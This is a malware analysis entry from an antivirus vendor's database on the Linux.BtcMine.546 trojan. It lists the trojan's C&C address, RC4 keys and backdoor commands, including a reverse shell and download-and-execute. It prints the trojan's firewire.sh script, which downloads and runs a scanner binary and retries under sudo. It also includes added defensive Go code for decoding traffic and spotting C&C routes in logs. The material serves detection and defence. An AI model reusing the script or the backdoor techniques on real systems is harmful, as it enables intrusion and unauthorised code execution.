
Linux.BtcMine.546

Added to the Dr.Web virus database: 2022-06-09

Virus description added:

sha1

  • e545ceffc8948e3ca9900212807cf3a862d33581

Description

Linux.BtcMine.546 is a trojan backdoor program capable of infecting Linux devices and launching a cryptocurrency miner. This trojan has advanced remote control capabilities. It is implemented as an ELF64 executable file written in Go.

Operating routine

When launched, the trojan checks whether it has been run on the computer before. If it finds a running process, as indicated by the presence of a .lock file, the instance of the trojan that is running is terminated. The trojan then obtains its settings using the envconfig library, which allows it to initialize its configuration based on the environment variables. In particular, envconfig writes the IP address of the C&C server and the flag for enabling the miner into the Specification structure:

type Specification struct {
    Backend   string // IP address of the C&C server, string encoded with RC4
    Debug     bool
    DisableMi bool   // miner activation flag
}

If the IP address of the C&C server is not specified in the configuration, the trojan uses the default address hxxp://185.154.53[.]140. System information, including the operating system name, architecture type, trojan version, number of processor cores, memory size, and other parameters, is sent to the control server. Once this happens, the trojan is ready to receive commands. Note that all traffic between the trojan and the control server is encrypted with the RC4 stream cipher. The following two sequences are used as keys: 2abd6e2c1akl762939453125 and 764153446b61.
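The same two keys protect both the RC4-encoded Backend value in the configuration above and the C&C traffic, so an analyst decoding a capture only has to try each key and keep the result that reads as text. The helper below is an added example for that task, not Dr.Web's or the trojan's code; it assumes the printed key strings are used directly as raw ASCII key material, and the sample message it decodes is constructed here.

```go
package main

import (
	"crypto/rc4"
	"fmt"
	"unicode"
)

// The two RC4 keys quoted above, used here as raw ASCII bytes (an assumption about key derivation).
var knownKeys = []string{"2abd6e2c1akl762939453125", "764153446b61"}

// rc4Apply encrypts or decrypts buf with key; RC4 is symmetric, so one function
// serves both directions. Both known keys have valid lengths, so NewCipher cannot fail.
func rc4Apply(key string, buf []byte) []byte {
	c, err := rc4.NewCipher([]byte(key))
	if err != nil {
		panic(err) // only reachable with a key outside 1..256 bytes
	}
	out := make([]byte, len(buf))
	c.XORKeyStream(out, buf)
	return out
}

// looksLikeText is the plausibility check: every byte is printable ASCII or whitespace.
func looksLikeText(b []byte) bool {
	for _, c := range b {
		if c > unicode.MaxASCII || (!unicode.IsPrint(rune(c)) && c != '\n' && c != '\r' && c != '\t') {
			return false
		}
	}
	return len(b) > 0 // an empty buffer tells us nothing
}

// Decode tries each known key against a captured message and returns the first
// readable plaintext together with the index of the key that produced it.
func Decode(captured []byte) (string, int, error) {
	for i, k := range knownKeys {
		if pt := rc4Apply(k, captured); looksLikeText(pt) {
			return string(pt), i, nil
		}
	}
	return "", -1, fmt.Errorf("no known key yields readable text")
}

func main() {
	// Constructed sample: a system-info payload of the kind the description says is
	// sent to the C&C server, encrypted with the first key to stand in for a capture.
	sample := rc4Apply(knownKeys[0], []byte(`{"os":"linux","arch":"amd64","cores":4}`))
	fmt.Println(Decode(sample))
}
```

The printable-text heuristic is deliberately loose; on a real capture, check that the result parses in whatever format the sample actually uses before trusting the key choice.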

List of supported commands

Name               Description
scan               Initiates a port scan
update             Downloads a new version of the trojan and restarts it
exec               Runs the command using /bin/sh -c
exec_output        Runs the command using /bin/sh -c; the result is sent to the C&C server
masscan            Creates a firewire.sh script, runs it, then deletes the script
socks              Creates a proxy (SOCKS5)
backconnect        Creates a reverse shell
request            Sends HTTP requests
tcp                Redirects the payload to the target computer
download_and_exec  Downloads a file and runs it; the result is sent to the C&C server and the downloaded file is deleted from the system
redisBrute         Starts brute forcing the authentication form in Redis
krongo             Changes the IP address of the active C&C server
stat               Sends information to the C&C server about how much memory the miner is using
mkill              Shuts down the miner

List of routes used

Route  Description                                             Method
/o     Sends results to the server                             POST
/mg    Obtains the PID of the current miner                    GET
/ms    Sends the miner PID                                     POST
/getT  Receives additional command information (arguments)    POST
/get   Obtains a task                                          GET
/s     Sends SOCKS5 connection data                            POST
/r     Sends the result of the executed command                POST
/l     Sends log files                                         POST
/h     Sends keep-alive packets                                GET
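The route table gives defenders two things to look for in web proxy or flow logs: any request to the default C&C address, and a client that works through several of these exact path/method pairs against one host (the beacon /h, the task fetch /get, the result post /r). The function below is an added detection example, not Dr.Web's or the trojan's code; its log line format "<src> <method> <host> <path>" and the sample lines are constructed for the example.

```go
package main

import (
	"sort"
	"strings"
)

// Route table from the description above: path -> HTTP method used.
var c2Routes = map[string]string{
	"/o": "POST", "/mg": "GET", "/ms": "POST", "/getT": "POST", "/get": "GET",
	"/s": "POST", "/r": "POST", "/l": "POST", "/h": "GET",
}

// Default C&C address quoted in the description, re-fanged for matching.
const defaultC2 = "185.154.53.140"

// ScanProxyLog reads constructed log lines "<src> <method> <host> <path>" and
// returns, keyed "src->host", the sorted matching routes of every pair that
// either talks to defaultC2 or hits at least minRoutes distinct routes with
// the method the trojan uses. The paths are short and generic, so on their
// own they are a weak signal: keep minRoutes well above 1.
func ScanProxyLog(lines []string, minRoutes int) map[string][]string {
	hits := map[[2]string]map[string]bool{}
	for _, ln := range lines {
		f := strings.Fields(ln)
		if len(f) != 4 {
			continue // malformed line
		}
		pair := [2]string{f[0], f[2]}
		if hits[pair] == nil {
			hits[pair] = map[string]bool{} // remember the pair even with no route hit
		}
		if m, ok := c2Routes[f[3]]; ok && m == f[1] {
			hits[pair][f[3]] = true
		}
	}
	out := map[string][]string{}
	for pair, routes := range hits {
		if pair[1] != defaultC2 && len(routes) < minRoutes {
			continue
		}
		rs := make([]string, 0, len(routes))
		for p := range routes {
			rs = append(rs, p)
		}
		sort.Strings(rs)
		out[pair[0]+"->"+pair[1]] = rs
	}
	return out
}
```

Because the krongo command can move the trojan to a new C&C address, the route-count rule is what catches hosts beaconing to an address that is not yet on a block list.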

The firewire.sh script created and executed by the trojan checks the OS distribution information in the /etc/os-release file, determines the type of package manager, looks for the installed libpcap-devel package (a library for low-level network monitoring) and installs it if it is missing. It then compares the MD5 hash of the firewire scanner binary against a hard-coded value, downloads the binary with curl or wget from the URL passed as the fifth argument if the hash does not match (or if md5sum is unavailable), and runs it against the supplied target list with the given port and rate, retrying under sudo if the first run fails.

#!/bin/sh
PORT=$1
RATE=$2
INPUT=$3
OUTPUT=$4
MASSCAN=$5
cat /etc/os-release | grep -vw grep | grep "rhel" >/dev/null
if [ $? -eq 0 ]
    then
        rpm -qa | grep libpcap-dev > /dev/null
        if [[ $? -eq 0 ]]; then
        echo "Package is installed rhel!"
    else
        echo "Package is NOT installed rhel!"
        yum -y update
        yum -y install  libpcap-devel
    fi
else
    if [ $(dpkg-query -W -f='${Status}' libpcap-dev 2>/dev/null | grep -c "ok installed") -eq 0 ];
        then
        echo "Package is NOT installed deb!"
        apt-get update
        apt-get install -y libpcap-dev
    else
        echo "Package is installed deb!"
    fi
fi
if [ -x "$(command -v md5sum)" ]; then
    sum=$(md5sum firewire | awk '{ print $1 }')
    echo $sum
    case $sum in
    45a7ef83238f5244738bb5e7e3dd6299)
        echo "firewire OK"
        ;;
    *)
        echo "firewire wrong"
        (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
       ;;
    esac
else
    echo "No md5sum"
    (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
fi
chmod +x firewire
./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2>/dev/null
if [ $? -eq 0 ]
    then
    echo "success"
else
    echo "fail"
    sudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2>/dev/null
    if [ $? -eq 0 ]
    then
        echo "success2"
    else
        echo "fail2"
    fi
fi

The trojan uses a Go-adapted version of the psutil library to obtain information about running processes: https://github.com/shirou/gopsutil/tree/master.

HTTP requests are processed using the Resty library: https://github.com/go-resty/resty.

Interaction with SOCKS5 proxies is enabled using the go-socks5 package: https://github.com/armon/go-socks5.

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
